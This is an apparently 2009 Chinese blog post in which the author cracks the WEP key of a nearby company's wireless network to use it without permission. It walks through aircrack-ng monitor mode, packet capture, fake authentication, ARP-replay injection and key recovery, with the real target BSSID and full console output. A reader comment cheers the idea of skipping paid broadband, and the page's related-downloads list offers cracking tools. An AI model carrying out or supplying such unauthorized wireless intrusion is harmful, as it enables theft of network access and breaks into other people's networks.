`
gladstone
  • 浏览: 68447 次
  • 性别: Icon_minigender_1
  • 来自: 上海
最近访客 更多访客>>
社区版块
存档分类
最新评论

[大家上才是真的上] 使用无线蹭网工口物aircrack-ng分享互联网

阅读更多

公司木有无线网络, 所以自从入手E63开始就觊觎园区的无线了. 网上找了找linux下比较流行的工具是aircrack-ng ,很好很强大.

看了扶凯桑给的一个实例, 不过和俺用的攻击方式不一. 官网上资料充足, 下面memo一下过程,仅供参考, 不推荐恶意实践.

 

使用的机器是改装EEEPC, UBUNTU8.10, 前提是安装aircrack-ng(apt-get简单入手).

1 设置网卡为监听模式

gladstone@gladstone-eeepc:~$ sudo airmon-ng start wlan0 

2 寻找目标AP(Access Point)

gladstone@gladstone-eeepc:~$ sudo airodump-ng  mon0

会出现一个列表,列出可用的无线网络, 这里找到目标路由器的bssid为00:B0:0C:02:A7:DE, 而ifconfig得到本机的mac地址是00:15:af:a6:c8:d7

3 开始收集信息

gladstone@gladstone-eeepc:~$ sudo airodump-ng -c 1 --bssid 00:B0:0C:02:A7:DE  -w out-ag mon0

需要注意的是参数

–c 是目标AP所在的频道, 这里是1

--bssid 输入目标AP的mac地址

-w 是写入到文件的前缀定义,这里设定为out-ag 的话,真正的输出文件会是out-ag-01.cap

 

控制台输出:

CH  1 ][ Elapsed: 4 mins ][ 2009-06-03 09:55 ][ fixed channel mon0: 7                                          
                                                                                                                                         
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID 
                                                                                                                                         
00:B0:0C:02:A7:DE  155  12     1033    19059   19   1  54  WEP  WEP    OPN  wanrongtouzi                                                
                                                                                                                                         
BSSID              STATION            PWR   Rate  Lost  Packets  Probes                                                                 
                                                                                                                                         
00:B0:0C:02:A7:DE  00:B0:C6:00:46:1F  163  18- 2     0       24  wanrongtouzi                                                             00:B0:0C:02:A7:DE  00:15:AF:A6:C8:D7    0   0- 0  157795    88998

 

注意这个终端不要关掉,在整个破解过程中都要开着以收集信息.

4 开始进行攻击

攻击使用的是aireplay-ng 工具,这个工具通过参数可以设定攻击方法(具体见aireplay-ng  --help), 扶凯桑用的是chopchop, 这里用arp

gladstone@gladstone-eeepc:~$ sudo aireplay-ng -3  -a 00:B0:0C:02:A7:DE -b 00:B0:0C:02:A7:DE -h 00:15:af:a6:c8:d7 mon0

这里一开始遇到问题, 控制台收到如下信息

You should also start airodump-ng to capture replies. 
Notice: got a deauth/disassoc packet. Is the source MAC associated ? 
Notice: got a deauth/disassoc packet. Is the source MAC associated ?

这个问题在官网wiki上有详细描述: http://www.aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase

解决办法就是在执行上述命令之前先进行认证:

gladstone@gladstone-eeepc:~$ sudo aireplay-ng -1 0 -a 00:B0:0C:02:A7:DE  -e wanrongtouzi -h 00:15:af:a6:c8:d7 mon0

09:51:26  Waiting for beacon frame (BSSID: 00:B0:0C:02:A7:DE) on channel 1 

09:51:28  Sending Authentication Request (Open System) 
09:51:28  Authentication successful 
09:51:28  Sending Association Request 

09:51:33  Sending Authentication Request (Open System) 
09:51:33  Authentication successful 
09:51:33  Sending Association Request 
09:51:33  Association successful :-) (AID: 1)

然后再重新开始攻击: 
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -3  -a 00:B0:0C:02:A7:DE -b 00:B0:0C:02:A7:DE -h 00:15:af:a6:c8:d7 mon0

09:52:00  Waiting for beacon frame (BSSID: 00:B0:0C:02:A7:DE) on channel 1 
Saving ARP requests in replay_arp-0603-095200.cap 
You should also start airodump-ng to capture replies. 
^Cad 108414 packets (got 56293 ARP requests and 44578 ACKs), sent 50832 packets...(499 pps)

执行完这步就开始静候,发现包的数量快速上升, 在另外一个控制台(airodump-ng)里可以观测到注入的跑的数量上升, #/s指标达到30左右(这个没有定量,官方的说法是可以达到几百, 在家里试的时候最高到了80, 可能和机器速度有关)

 

5 根据收集的信息破解密码

大约过2分钟就可以试着使用aircrack-ng 进行破解了,上面说到收集到的包都存在out-ag-01.cap 文件里面

gladstone@gladstone-eeepc:~$ sudo aircrack-ng out-ag-01.cap

Opening out-ag-01.cap 
Read 94019 packets. 

   #  BSSID              ESSID                     Encryption 

   1  00:B0:0C:02:A7:DE  wanrongtouzi              WEP (17803 IVs) 

Choosing first network as target. 

Opening out-ag-01.cap 
Attack will be restarted every 5000 captured ivs. 
Starting PTW attack with 17887 ivs. 


                                                              Aircrack-ng 1.0 rc1 
                                                              Aircrack-ng 1.0 rc1 
                                                              Aircrack-ng 1.0 rc1 
                                              [00:00:01] TesteAircrack-ng 1.0 rc117823 IVs) 
                                              [00:00:03] TesteAircrack-ng 1.0 rc117823 IVs) 
   KB    depth   byte(vote)                   [00:00:04] TesteAircrack-ng 1.0 rc117823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:06] TesteAircrack-ng 1.0 rc117823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:07] TesteAircrack-ng 1.0 rc117823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:09] TesteAircrack-ng 1.0 rc117823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:11] TesteAircrack-ng 1.0 rc117823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:12] TesteAircrack-ng 1.0 rc1 17823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:14] TesteAircrack-ng 1.0 rc1 17823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:14] TesteAircrack-ng 1.0 rc1 17823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:15] TesteAircrack-ng 1.0 rc1 17823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:16] Tested 1347841 keys (got 17823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:17] Tested 1425601 keys (got 17823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784)[00:00:17] Tested 3002 keys (got 17823 IVs) 
   KB    depth   byte(vote)D7(23040) 24(22784) AA(22784) CB(22784) 4E(22528) 39(22272) 50(22272) 75(21504) 81(21504) 
   KB    depth   byte(vote)D7(23040) 24(22784) AA(22784) CB(22784) 4E(22528) 39(22272) 50(22272) 75(21504) 81(21504) 
    0    4/  8   AA(23296) 39(23040) 4E(23040) CE(22784) 0F(22272) 50(22272) 25(22016) 75(22016) 81(22016) E4(22016) 
    1    0/  5   BB(25088) 78(24064) 5D(23808) 8D(23808) 3A(23296) BD(23040) 68(22784) 8C(22784) 3F(22528) A5(22528) 
    2    6/  8   A1(23296) 31(23040) 4F(23040) C8(23040) D5(23040) DC(22784) 2D(22528) 78(22528) 3D(22272) 5B(22272) 
    3    0/ 10   DD(23808) 12(23296) A8(23040) C0(23040) 1F(22528) 25(22528) DB(22272) F3(22272) 00(22272) 56(22272) 
    4    0/  1   FF(31488) E5(24320) 29(23552) 3C(23552) 40(23552) 49(23296) F8(23296) 47(23040) 60(23040) C1(23040) 

                         KEY FOUND! [ AA:BB:CC:DD:FF ] 
    Decrypted correctly: 100%

顺利得到密码, 还真是设置的够简单= _ =.

上面提到的只是简单的WEP的破解, 根据密码设置的复杂程度所用时间不一, WPA貌似很难破解, 下次再试试

 

原文链接

0
0
分享到:
评论
1 楼 jianfeng008cn 2009-06-04  
佩服佩服,以后在小区里就不用花钱装宽带了~~

相关推荐

    无线安全及Aircrack-ng for windows教程.docx

    ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全...

    AirCrack-NG-1.2-win

    Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念...

    Windows系统下运行aircrack-ng

    aircrack-ng V1.6现支持在Windows系统下运行,可以通过CMD输入命令方式破解无线网络,或通过aircrack-ng GUI图形界面对无线进行破解

    aircrack-ng-win_for_windows版使用说明

    aircrack-ng-win_for_windows版使用说明,很详细。 有术语解释,有使用说明。

    aircrack-ng_1.1

    Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站或[1])并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, ...

    aircrack-ng-win,无线网络破解

    步骤1:搜索无线接入点信号,在Windows下可以使用的无线信号搜索工具有NetStumbler、WirelessMon、OmniPeek、Commview for WiFi等等,下图为使用Commview for WiFi进行无线扫描,可以看到,扫描到SSID为AR7WRD的无线...

    aircrack-ng-1.0-0.9.5-cdl.tgz

    把此文件放在Cdlinux镜像的Cdlinux\Local目录下(注意别改名!),此Cdlinux即可在终端使用aircrack-ng工具集了。 请先研究相关法规,或者只对自家AP实验!

    aircrack-ng-1.2-beta1.tar.gz

    aircrack-ng-1.2-beta1.tar.gz

    Aircrack-ng GUI

    Aircrack-ng for Windows的GUI,有需要的同学请自取!

    aircrack-ng-1.2-rc4-win

    aircrack用于打开WI-FI密码

    aircrack-ng-1.2

    aircrack-ng-1.2-windows 下载的资源是window版本的。可以使用。wpa2-psk破解工具。

    aircrack-ng-1.6.tar.gz

    aircrack-ng软件,从https://aircrack-ng.org/doku.php?id=Main官网下载。支持在linux上编译安装。

    aircrack-ng-1.2-rc1-win

    2.airdecap-ng 解读被破解的网络数据包 3.airmon-ng 为使用整个aircrack-ng套件配置一个网卡 4.aireplay-ng 在无线网络中产生可能在恢复中的WEP密钥所需的流量 5.airodump-ng 捕获被aircrack-ng用于破解WEP密钥的...

    aircrack-ng-1.6-win.zip

    aircrack-ng-1.6-win.zip

    aircrack-ng GUI

    aircrack-ng GUI 一款小软件 ,找了很久才搜到,希望能给大家用上!

    aircrack-ng-1.2-rc2-win

    Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,...Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。

    aircrack-ng-1.1-win,无线网络破解

    步骤1:搜索无线接入点信号,在Windows下可以使用的无线信号搜索工具有NetStumbler、WirelessMon、OmniPeek、Commview for WiFi等等,下图为使用Commview for WiFi进行无线扫描,可以看到,扫描到SSID为AR7WRD的无线...

    aircrack-ng-1.0.tar.gz WIFI破解软件

    LINUX平台WIFI密码破解软件aircrack-ng-1.0.tar.gz

    aircrack-ng-1.5.2-win.zip

    aircrack-ng-1.5.2-win.zip

    aircrack-ng交叉编译资源.rar

    在RK3399平台下(aarch64-linux-gnu-*交叉编译工具链),交叉编译和移植aircrack-ng所需的源码和依赖库的源码安装包。

Global site tag (gtag.js) - Google Analytics